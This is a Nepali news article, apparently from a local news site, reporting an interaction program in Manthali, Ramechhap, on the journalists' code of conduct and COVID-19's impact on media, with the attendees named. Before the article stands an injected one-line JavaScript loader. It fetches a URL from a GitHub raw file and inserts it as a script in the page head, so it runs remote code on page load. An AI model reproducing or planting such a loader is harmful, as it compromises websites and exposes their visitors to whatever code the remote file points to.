;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
मंसिर २९,
रामेछाप । रामेछाप जिल्लाको सदरमुकाम मन्थलीमा पत्रकार आचासंहिता र कोभिड- १९ ले मिडियामा पारेको प्रभा विषयमा अन्तरक्रिया कार्यक्रम सम्पन्न भएको छ ।
सोमबार नेपाल पत्रकार महासंघ रामेछापको मिडियाहलमा महासंघको संयोजन र प्रेस काउन्सिल नेपालको आयोजनामा कार्याक्रम सम्पन्न गरिएको हो । कार्याक्रममा रामेछाप जिल्ला समन्यव समितिका प्रमुख प्रेम बहादुर खड्का, मन्थली नगरपालिकाका नगरप्रमुख रमेश कुमार बस्नेत, प्रमुख प्रशासकिय अधिकृत लिलाराज पौडेल, पत्रकार महासंघ रामेछापका अध्यक्ष रमेश ढुंगेल, प्रेस काउन्सिल नेपालका सदस्य चेतनाथ धमला र निवर्तमान सदस्य ईश्वरी ओझा, नेपाल पत्रकार महासंघ रामेछापका पूर्व अध्यक्षहरु नवराज पथिक, हिमाल ढुङ्गेल, बद्रिनयाँघरे, टिकाप्रसाद भट्ट, संघठनका प्रमुख तथा प्रतिनिधिहरु, जिल्लामा संचालित रेडियोका संचार्कर्मीहरु, पत्रकारहरुको सहभागिता रहेको थियो ।
कार्याक्रममा प्रेस काउन्सिलका पदादिकारीहरुले पत्रकारहरुको आचरसंहिताको विषयमा जानकारी गराएका थिए ।
कार्यक्रममा प्रेस काउन्सिल नेपालका सूचना अधिकारी एवं उपप्रशासकिय अधिकृत रामशरण बोहराले प्रेस काउन्सिल नेपालले अहिलेसम्म गरेको काम र त्यसको प्रभावका बारेमा जानकारी गराएका थिए । उनले जिल्लामा पत्रकारहरुले हाल सम्ममा आचरसंहिताका नियम सामान्यतर पालन गरेरै समाचारहरु प्रकाशन प्रशारण गरिरहेको बताउदै आगामी दिनमा पनि यसको निरणतर्ता हुनु पर्नेमा जोड्दिए ।
त्यस्तै जिल्लाबाट संचालमा रहेका अन्लाई, पत्रपत्रिका, रेडियोहरुलाई अनिवार्या दर्ता गरेर संचालन गर्न निर्देशन दिएका छन् ।
फेसबुक प्रतिक्रियाहरु